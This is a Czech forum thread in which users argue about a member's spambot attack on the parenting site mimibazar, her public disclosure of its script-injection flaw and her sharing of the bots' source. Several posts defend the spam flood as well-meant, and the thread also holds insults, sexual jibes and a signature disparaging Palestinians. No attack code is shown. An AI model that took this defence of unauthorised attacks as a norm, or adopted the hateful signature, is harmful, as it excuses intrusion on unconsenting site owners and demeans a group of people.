Hrubým způsobem jí to napsal Jenda, tak nás laskavě neházej do jednoho pytle. Jinak mi přijde zábavné, jak se v tobě probouzí protektivita jen na základě toho že někdo použije ženský avatar.
Ano, hrubým způsobem jí to napsal Jenda, tys na to neměl kuráž a tak jsi pouze neupřímně přitakával jaká je to prospěšná zpětná vazba. Milá Gréta má určitě za sebou v závěsu administrátorky z mimibazaru, přece si nezredukuješ pool potenciálních samic nějakým přisprostlým dirty talkem
Vážně jsi tak mimořádně nadaný empatik, že si myslíš že považuji naši Grétu za tu Grétu? Nevím o ní nic, může to být Amiga, může to být skutečná puberťačka a dokonce to můžeš být i ty ("Se mi líbí...")!
Možná tě ten projekt už vyčerpával, možná jsi udělal nějakou chybu při útoku na mimibazar a teď se toho profilu potřebuješ zbavit a tak jsi vymyslel tuto veřejnou popravu. Už jenom jak tady lituješ že nemáš holčičí krycí identitu
Ale dejme tomu, že Gréta je skutečně nějaký(á) pubertální script kiddie. Pokud k ní tak budeme přistupovat, tak nejhorší možný scénář je, že Amigovi (nebo tobě) v rozkroku tepláků naroste boule. To nezní tak hrozně, ne?
Security komunita má poměrně jasně daný kodex chování. Tam například patří, že je ok hledat chyby a reportovat je, ale není ok spamovat, nebo ničit funkčnost stránky. V případě že nereagují, tak je v pohodě zveřejnit článek o chybě, i když ideálně s ne úplně kompletními informacemi, aby člověk předešel tomu že to budou zneužívat script kiddies.
Mám dojem, že vše vyjma spamu Gréta splnila.
když to nepodložíš žádnou další argumentací a používáš to v podstatě jen jako urážku
Jedním z projevů nabubřelého ega je, že se nabubří hned jak na jeho nabubřelost upozorníš
Kde chceš nakreslit hranici?
Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestalo a ty si s dětinskou tvrdohlavostí trváš na svém jakou naše Gréta způsobila hroznou katastrofu. Měl bys přijmout holá fakta a naší milé Grétě se pořádně omluvit
26.1.2020 23:54
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestaloJá tím jak mimibazar neznám a útok jsem neviděl, tak možná úplně nechápu, co se stalo, ale představuju si to jako kdyby sem někdo začal vkládat do všech aktuálních vláken stovky/tisíce spamových komentářů. Je to tak? Je to OK?
Mám dojem, že vše vyjma spamu Gréta splnila.No vždyť přesně o to alespoň mně jde.
Podle zdrojového kódu jeden "Grétobot" odeslal do náhodných diskuzních vláken 10 nových komentářů a 50 reakcí, tedy 60 za každého robota. No,a když si vyhledáš všechny inzerenty s přezdívkou začínající na "gretobot", tak jich to vyplivne pouze 24, žádná velká armáda robotů se patrně nekonala . A z toho vychází celková suma spamových komentářů 60*24=1440. U těch profilů je vidět časový údaj poslední aktivity a z toho lze vyvodit že celý útok trval cca jednu hodinu mezi 11:50 a 12:50 v pátek 3.1. Předpokládám, že 24 účtů může ještě celkem snadno zablokovat administrátor ručně v nějakém grafickém rozhraní. Ano, nebylo to moc hezké ale jako útok si to představuji jinak.
Pochopitelně nelze vyloučit že by ty své skripty nepozměnila, než je zde zveřejnila.
Těch 1440 je maximální možná suma odeslaných komentářů, to ještě neznamená že by jich tam najednou reálně tolik bylo. Gréta dokonce psala že použitých robotů bylo "jenom pár", jestli to v záplavě smutných smajlíků dokážeš přečíst.
Zdá se, že situaci vnímáš horší než doopravdy je, dokonce to lze početně dokázat: půl druhého tisíce je o šedesát více než 1440. Samotné se to může zdát jako nepodstatný detail, ale když si k tomu přidáš nadužívání vulgarismů, sestavovní hypotetických paranoidních scénářů a zjevné sadistické tendence... Nejprve si zameť na vlastním prahu, až pak se pouštěj do druhých. Jinak ti lze jen težko věřit že se nesnažíš ze sebe ventilovat jen a pouze své vlastní problémy. Všechna ta anonymizace ti bude k ničemu když budeš v afektu pouštět náhodné kolemjdoucí hluboko do nitra své duše
Naší milé Grétě bylo navařeno už tolik dršťkové polévky, že se zde celý týden neobjevila. Vážně něčemu pomůže, když do hrnce ještě navrch přihodíš tu svoji půlku mozku? Třeba Gréta od nás dávno utekla, třeba se právě teď někde mstí světu a znovu na to používá tor... A třeba pouze proto, že si nepřečetla tvoji jinak přínosnou technickou poznámku, bohužel utopenou v hrubostech a sprostotách. Za to by pochopitelně mohl jen a pouze tento tvůj druh přístupu, jaký jsme už v této diskuzi v mnoha komentářích již mohli vidět, že. Byla by škoda Grétu ztratit kvůli pouhému jedinému drobnému přešlapu na nějakém mimibazaru.
Upřímně, taky se občas pohybuji na hraně, ale takovéhle píčoviny jsem nedělal ani v 15.
Tak s Bystroušákem máme problém takovou hranici přesně vytyčit, já si dokonce myslím že to ani není možné. Třeba jsi ji i ty někdy překročil a ani o tom nevíš. A být z toho malér, tak by se ti možná hodil někdo kdo by se tě zastal, určitě bys mu nechtěl pálit šulína BTW, Na takový pisoár bych nerad narazil, bral bych raději "pusinkový útok" na server
27.1.2020 01:45
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Ano, hrubým způsobem jí to napsal Jenda, tys na to neměl kuráž a tak jsi pouze neupřímně přitakával jaká je to prospěšná zpětná vazba. Milá Gréta má určitě za sebou v závěsu administrátorky z mimibazaru, přece si nezredukuješ pool potenciálních samic nějakým přisprostlým dirty talkemHele, proč vůbec vedeme tuhle diskuzi? Já si nemyslím že jsi špatný člověk, nebo je s tebou něco špatně, jen jsem tě upozornil na to že to děláš. Tohle je taková exploze přesměrování na všechny možné strany, že to stejně nikam nepovede. Je mi jasné, že si nemyslíš že je to TA Gréta, ale už jen z toho že o téhle existenci mluvíš v ženském rodě, natožpak že se jí zastáváš a považuješ cokoliv co udělá za roztomilé jasně značí, že se dopouštíš kognitivního zkreslení. To co jsem napsal byla jen snaha tě na to upozornit.
Jedním z projevů nabubřelého ega je, že se nabubří hned jak na jeho nabubřelost upozorníš*Sigh*. Člověk tě požádá, aby ses rozepsal a místo toho si jen validuješ předsudky. To jsem to řekl nějak nejasně, nebo ti připadalo, že si to nezasluhuje odpověď, nebo proč neodpovíš normálně? Ten projev co popisuješ (tedy ozvat se na výtku) je taky projevem obecně vytýkání něčeho, co druhá osoba vnímá jako nespravedlivé a obecně je tak častý a široký, že je v podstatě jako detekce úplně k ničemu. Nehledě na to že ho používáš teprve zpětně. Něco tě k tomu muselo vést předtím, tak co to bylo? Upřímně by mě to s tím egem zajímalo, proč si to myslíš, jak se to projevuje. Je to k něčemu? Jak přesně identifikuješ projev ega a ostatní projevy. A tak.
Mám dojem, že vše vyjma spamu Gréta splnila.+ dávat zdrojáky spambotů, že.
Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestalo a ty si s dětinskou tvrdohlavostí trváš na svém jakou naše Gréta způsobila hroznou katastrofu. Měl bys přijmout holá fakta a naší milé Grétě se pořádně omluvitNetrvám na tom že způsobila katastrofu, ale že jde o nepřijatelné jednání za hranou. A ideálně jsem chtěl vést třeba diskuzi o té hranici, snažil jsem se o to už dvakrát, ale nikdo se nechytl.
že se jí zastáváš a považuješ cokoliv co udělá za roztomilé jasně značí, že se dopouštíš kognitivního zkreslení.
Tak já nemám moc rád když se lidé chovají jako slepé stádo, které by nejraději někoho lynčovalo. Ještě více mne to trápí u chytrých lidí, u nich předpokládám alespoň nějaké základní zábrany a nadhled nad situací. Mimochodem, stádový efekt je také jedním z druhů kognitivního zkreslení.
Gréta se možná vypravila za přípustnou mez ale věřím, že to myslela dobře a skutečně to byla snaha těm stránkám pomoci, viděl jsem ji například pomáhat ve zdejší poradně. Možná že ji prostě nedošlo že něco provedla špatně a tak si ještě dala tu práci a vytvořila pro nás blogový zápisek ve kterém vše sepsala a zdokumentovala. A teď se do ni za její dobře míněnou snahu téměř všichni hrubě dají že raději znechuceně odešla pryč, nebo se zde bojí vystrčit nosánek aby se do ní opět nepustili. Tohle je přeci špatně, ne?
Z doby, kdy to bylo ještě čiré sci-fi si vzpomínám na video z prezentace firmy, která dle svého tvrzení vytvořila fuknční prototyp kvantového počítače a snažila se případným zájemcům prodat výpočetní čas. Jenže ten počítač nikdo nikdy neviděl, neukázali jedinou fotografii, nezveřejnili žádné technické údaje, vlastně ani nebylo jisté, zda je to skutečně kvanotvý počítač. Prostě dejte program, my Vám ho na našem stroji necháme nějakou dobu běžet a pošleme zpátky výsledek. To samozřejmě návštěvníky prezentace dráždilo a neustále se na samotný počítač a praktické řešení ptali, až se jeden z řečníků neudržel a prohlásil něco v duchu: "V case počítače máme zavřeného kouzelného skřítka. Co je Vám do toho, jak výpočty realizujeme."
Tím chci říct, že vlastně vůbec nezáleží na tom jestli je naše Gréta opravdová script kiddie puberťačka, jestli se ta Gréta neučí za školou češtinu a programovat, jestli třeba naše Gréta sama není skutečně pokročilým internetovým robotem, jestli má Amigovo delirium i světlé chvilky, jestli se pár něčích mozkových gyrů vyzkratovalo nadužíváním kofeinových suplementů a získaly autonomii na zbytku vědomí
Jediné, co můžeme spolehlivě zkoumat, jsou vnější projevy. No, a ty jsou u naší milé Gréty často prospěšné, to považuji za mnohem důležitější, než jesli je "kouzelným skřítkem v case počítače". V reálném světě by něco takového bylo poměrně bizarní ale internetové fórum snad něco takového ještě unese .
Ale vše co dělá, za roztomilé nepovažuji, "pusinkový útok" opravdu nebylo nic hezkého ale současně také nic za co by měl rozhořčený dav věšet na nejbližší strom. Byl to od ní drobný přešlap v jinak dobrém úmyslu, pokud je dost inteligentní tak jí stačí vše vysvětlit, pokud ne, tak by stejně celá zdejší diskuze postrádala smysl.
A třeba jak rozbila toho skleněného Buddhu, to bych se na ni vydržel zlobit nejméně dobrých pět minut
Upřímně by mě to s tím egem zajímalo, proč si to myslíš, jak se to projevuje
K tomu nemám patřičnou odbornost ale něco bych přeci jen vypíchl.
Nechci se tě dotknout, ale vůbec o sobě a své pravdě nepochybuješ. Tak například máš potíž se zkusit podívat na svět jejíma očima a snažit se pochopit její motivy, to co ty vnímáš jako nesmyslný vandalismus může ona považovat za obecně prospěšnou činnost. Četl jsi vůbec Grétin recept na sněhové pusinky, kterým spamovala, nebo jsi ho apriori odsoudil? Píše tam něco o ruském spamu a obavách, že se mimibazar vývojáři pokusí ošidit. A ono se nakonec ukázalo že měla pravdu, nové stránky nestojí ani za zlámanou grešli. Vážně je to v tomto kontextu vandalismus?
Automaticky předpokládáš, že ví to samé co ty, například že zná kodex bezpečnostní komunity, nebo že vůbec tuší, že něco takového existuje. Na hacking může mít seterotypní pohled z médií a chyby se přece zveřejňují, pořád o tom někde píší a mluví, že.
Btw, nemohu se zbavit pocitu, že do celého problému latentně vnášíš obavy o svoji vlastní počítačovou infrastrukturu a to zkresluje tvůj pohled na celou věc
dávat zdrojáky spambotů, že
Mně vyšší princip mravní nezabránil pokusit se ty skripty spustit. Mám dojem, že Grétin samopal na sněhové pusinky má hlavěň zalitou olovem, alespoň tedy prozatím . Pokud na mimibazaru měli nějakého ruského spambota, tak nelze nijak uškodit zveřejněním analogického zdrojového kódu, naopak je dobré dozvědět se něco o jeho vektoru.
vést třeba diskuzi o té hranici
Nemyslím si, že je možné takovou hranici exaktně vytyčit, on to možná překvapivě nebude technický problém. Na formy útoku by se mělo nahlížet jako na pouhé nástroje. No, a nástroj můžeš přece použít jakkoliv, kladívkem můžeš zatloukat hřebíky ale můžeš s ním i druhého přetáhnout přes hlavu. A můžeš s ním opravit dřevěný plot souseda, který o to ale vůbec nestojí a stejně tak můžeš kladívkem zrádně ze zálohy zneškodnit nejhledanějšího terroristu světa. Asi by bylo nutné zohlednit kromě použitých prostředků motiv, prospěšnost daného činu a další jen těžko měřitelné aspekty. Lze o tom dlouze diskutovat ale nedobereme se ničeho.
30.1.2020 16:40
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Tak já nemám moc rád když se lidé chovají jako slepé stádo, které by nejraději někoho lynčovalo. Ještě více mne to trápí u chytrých lidí, u nich předpokládám alespoň nějaké základní zábrany a nadhled nad situací. Mimochodem, stádový efekt je také jedním z druhů kognitivního zkreslení.To vůbec nevím kde jsi vzal, když nás tu kritizujících bylo jen pár. Rozhodně v době kdy jsem se do diskuze pustil já, tak nás tu bylo kolik? Dva? To se ti zdá jako stádo?
Gréta se možná vypravila za přípustnou mez ale věřím, že to myslela dobře a skutečně to byla snaha těm stránkám pomoci, viděl jsem ji například pomáhat ve zdejší poradně. Možná že ji prostě nedošlo že něco provedla špatně a tak si ještě dala tu práci a vytvořila pro nás blogový zápisek ve kterém vše sepsala a zdokumentovala. A teď se do ni za její dobře míněnou snahu téměř všichni hrubě dají že raději znechuceně odešla pryč, nebo se zde bojí vystrčit nosánek aby se do ní opět nepustili. Tohle je přeci špatně, ne?Přestaň akceptovat její personu teen holky a předpokládej, že za tím stojí znuděný, pravděpodobně dospělý, pravděpodobně inteligentní člověk, který velmi pravděpodobně není Greta, není ženská a už vůbec nemá žádné dobré záměry nad to se sofistikovaně pobavit.
Jediné, co můžeme spolehlivě zkoumat, jsou vnější projevy. No, a ty jsou u naší milé Gréty často prospěšné, to považuji za mnohem důležitější, než jesli je "kouzelným skřítkem v case počítače". V reálném světě by něco takového bylo poměrně bizarní ale internetové fórum snad něco takového ještě uneseAno a ne. Kdysi jsem tu o tom psal blog Turingův diskutér. Skutečně je jedno kdo to konkrétně je a klidně tu personu můžeš žrát. Co není jedno je když se podle toho tak pak fakt začneš chovat. Například popřeš svůj interní systém pro morálku, protože je to přece roztomilá teenagerka, která to myslela dobře se sněhovou pusinkou, hehe, hihi.
Nechci se tě dotknout, ale vůbec o sobě a své pravdě nepochybuješ. Tak například máš potíž se zkusit podívat na svět jejíma očima a snažit se pochopit její motivy, to co ty vnímáš jako nesmyslný vandalismus může ona považovat za obecně prospěšnou činnost ..Ach jo. Gréta není Gréta. Lže ti už jen tím, že se vydává za někoho kým není. Naprosto neexistuje důvod, proč předpokládat že je to žena, že je to mladá holka, nebo že je nějak naivní. Je to vymyšlená postava, něco jako herec v divadle, který hraje tak dobře, že pořád zapomínáš že ve skutečnosti není tou rolí, kterou hraje. BTW: Nevnímám to jako nesmyslný vandalismus, vandalismus často dává perfektní smysl. To není důvod ho tolerovat.
Automaticky předpokládáš, že ví to samé co ty, například že zná kodex bezpečnostní komunity, nebo že vůbec tuší, že něco takového existuje. Na hacking může mít seterotypní pohled z médií a chyby se přece zveřejňují, pořád o tom někde píší a mluví, že.Větší část z toho je prostá logika. Například nerozhazovat kolem věci, které můžou jednoduše škodit, neukazovat neschopným a nezodpovědným lidem jak na to a tak.
Btw, nemohu se zbavit pocitu, že do celého problému latentně vnášíš obavy o svoji vlastní počítačovou infrastrukturu a to zkresluje tvůj pohled na celou věcMoje počítačová infrastruktura nestaví na nehacknutelnosti, naopak se snažím explicitně předpokládat, že úplně všechno bylo hacknuto.
Mně vyšší princip mravní nezabránil pokusit se ty skripty spustit. Mám dojem, že Grétin samopal na sněhové pusinky má hlavěň zalitou olovem, alespoň tedy prozatímKaždý trochu schopný programátor je schopný chrlit podobné věci na počkání v podstatě do nekonečna a nedá se proti tomu automatizovaně bránit. Je dobré si uvědomit, že útočník má vždycky výhodu. Sebelepší vojenská jednotka bude mít problém s připraveným náhlým útokem. Útočník je prakticky vždy ve výhodě. Prakticky všechno lze zničit a internet a většina software stojí do velké míry na tom, že to většina lidí nedělá. Pokud máš představu, že existuje bezpečný software, nebo že nějaké služby jsou bezpečné, tak je to jen iluze způsobená tím že nevíš dost, nebo nemáš dost velkou představivost. Jediný důvod proč to všechno pořád funguje je že lidi vesměs dospěli k názoru, že lepší je svět kde můžeš ostatním věřit a kooperovat s nimi, než na ně útočit.
Nemyslím si, že je možné takovou hranici exaktně vytyčit, on to možná překvapivě nebude technický problém.S tím souhlasím, jen dodám že jsem si nikdy nemyslel, že je to technický problém.
Na formy útoku by se mělo nahlížet jako na pouhé nástroje. No, a nástroj můžeš přece použít jakkoliv, kladívkem můžeš zatloukat hřebíky ale můžeš s ním i druhého přetáhnout přes hlavu. A můžeš s ním opravit dřevěný plot souseda, který o to ale vůbec nestojí a stejně tak můžeš kladívkem zrádně ze zálohy zneškodnit nejhledanějšího terroristu světa.Vidíš, konečně se někam dostáváme. Já s tím pohledem jako na nástroje souhlasím, dokonce i souhlasím s tím pohledem na použití. Rozdíl právě dělá to jak a jestli ho použiješ. A Gréta ten svůj použila vysloveně negativně. Zbraně taky nenecháváme válet se na ulici a jako společnost je tolerujeme. Co netolerujeme je jejich neoprávněné, či neschválené použití.
tak nás tu bylo kolik? Dva? To se ti zdá jako stádo?
Dva? Já před tvým komentářem napočítal nejméně čtyři další . A nevím, nevím, jak by to dopadlo bez mé intervence, kolik dalších by se připojilo ke stádu podobně jako Karel Benák a Odin1918. Ale uznávám, že tvá reakce byla v porovnání nejméně afektovaná.
Přestaň akceptovat její personu teen holky
Já zase nevím proč ti její persona tak vadí? Měli bychom hodnotit to, co provedla a s jakým úmyslem, ne jestli je naše Gréta roztomilá malá naivní holčička nebo nějaký starý zarostlý zanedbaný opilec s vychlastaným mozkem, to jsou přece argumenty ad hominem a ještě pravděpodobně špatně cílené.
Je to vlastně stejný druh problému, jako v tom tvém odkazovaném zápisku o králi Mohamedánů. Kdo je zač si stejně nikdy nemůžeme s jistotou ověřit a je zbytečné na to brát zřetel. Pouze se ta nejednoznačnost může stát zdrojem předsudků vůči milé Grétě. Více nadhledu a řídit se svým vlastním článkem
A Gréta ten svůj použila vysloveně negativně.
Tak já nesouhlasím s tím, že se jednalo o vandalismus a že by svoje "nástroje" použila čistě negativně, není nic špatného na tom hlásit chyby. A není nic špatného ani na tom uvědomit uživatele, pokud se správci nemají k opravám. Ano, šlo zvolit jinou, méně agresivní formu, méně obtěžovat uživatele problémy, kterým jen stěží rozumí nebo se s nimi rovnou hádat a ztratit nervy .
Přinejhorším bych to viděl někde v půli cesty, pokud ale budeme respektovat její dobrý úmysl tak se jednalo spíše o pozitivní "použití nástrojů". Zřejmě je chyba hodnotit jednotlivé skutky zvlášť, no, a pokud si provedeme celou bilnaci toho Grétina působení na bazaru a nebudeme hodnotit pouze spambota a zohledníme také hlášení chyb a nedostatků, tlak na vývojáře aby odvedli poctivou práci a nikoho nepodvedli, odhalení vektoru jiných spambotů etc. tak nám vyjde zaručeně pozitivní působení.
Je to podobné například situaci, kdy tě doktor chce naočkovat vakcínou, tak tě také musí bodnout jehlou. Tomu bys přece také nevynadal .
BTW, myslím si, že reakce davu by byla identická i kdyby mimibazar rovnou pwnla nebo pouze nespecificky napsala, že mají nezabezpečený tag script blozích.
a vylúčenie z elitného klubu dokonalých mamičiek ťa mrzieť nemusíTy taky vidíš elitní kluby všude kolem sebe...
To potom lehce ztrácí na významu.
takže každý člověk je ve výsledku asi v půltuctu fanatických sektáchAsi tak...
27.1.2020 16:38
Fluttershy, yay! | skóre: 92
| blog:
27.1.2020 16:47
Fluttershy, yay! | skóre: 92
| blog:
4.2.2020 11:34
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
31.1.2020 16:28
Blaazen | skóre: 24
| blog: BL
2.2.2020 16:39
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
a tak jo. sem náhodou jako skoro vubec nebulela abys jako věděl ;D
No, zaregistroval jsem se tam také, stále ten jsinject neměli ošetřený tak jsem se zeptal zda si vůbec uvědomují, jak je to závažná chyba, především když ji Grétka vytroubila do světa a zda bezpečnostní připomínky té naší Grétky berou vážně. A jak myslíte, že to dopadlo? DOSTAL JSEM BAN
S těma laktačníma psychózama se skutečně nedá rozumně bavit a jestli to Grétka s adminkama vydržela diskutovat celé dva týdny, tak hluboce smekám, mě by v mozku praskla cévka možná už do hodiny.
Zde na ukázku jedna z reakcí:
Prosím, co je tento "nevímkdo" zač? *-)Kamil Vávra (Yomagn´tho) ID 639838. Napsal mi dlouhatánský prapodivný mail týkající se Gréty (pusinky, čočková polévka atd.... nedávno tu strašila), oslovuje mě Milá Administrátorko ,-) a žvaní nesmysly. (smich)
4.2.2020 11:38
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
ještě by mě jako zajímalo kdo jako byl tvojeMámaYxd protože já to nebyla :D :D
2.2.2020 16:45
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
a že se už jako vubec nezlobíte a že jestli ještě jo tak už jenom trošičku???? sem vám taky všechny ty sprosťárny taky vodpustila já vim že ste to jako mysleli dobře já to taky s těma matronama myslela dobře problém maj vony nééé my ;D
5.2.2020 11:53
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
si myslim že teďko trucujete zase jako vy ;D
12.2.2020 18:09
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
rači ne :D :D :D :D
7.2.2020 21:23
vencour | skóre: 56
| blog: Tady je Vencourovo
| Praha+západní Čechy
12.2.2020 18:05
Gréta | skóre: 36
| blog: Grétin blogísek
| 🇮🇱==❤️ , 🇵🇸==💩 , 🇪🇺==☭
už to asi vopravujou hele takže za mě taky dobrý ;D
12.2.2020 20:36
vencour | skóre: 56
| blog: Tady je Vencourovo
| Praha+západní Čechy
